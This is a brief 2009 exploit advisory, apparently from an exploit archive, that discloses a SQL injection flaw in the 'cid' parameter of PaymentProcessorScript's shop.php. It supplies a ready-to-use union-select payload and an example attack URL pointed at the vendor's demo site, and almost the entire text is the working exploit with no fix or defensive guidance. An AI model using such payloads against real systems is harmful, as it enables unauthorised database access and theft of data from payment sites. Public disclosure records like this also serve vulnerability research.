/*

PaymentProcessorScript (cid) Remote SQL Injection Vulnerability

Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

SQL Injection shop.php (GET : cid) :
[HOST]/[PATH]/shop.php?cid=[SQL CODE]

SQL CODE : -1+union+select+1,2,version()--

Ex :
http://paymentprocessorscript.net/demo/shop.htm?cid=-1+union+select+version()--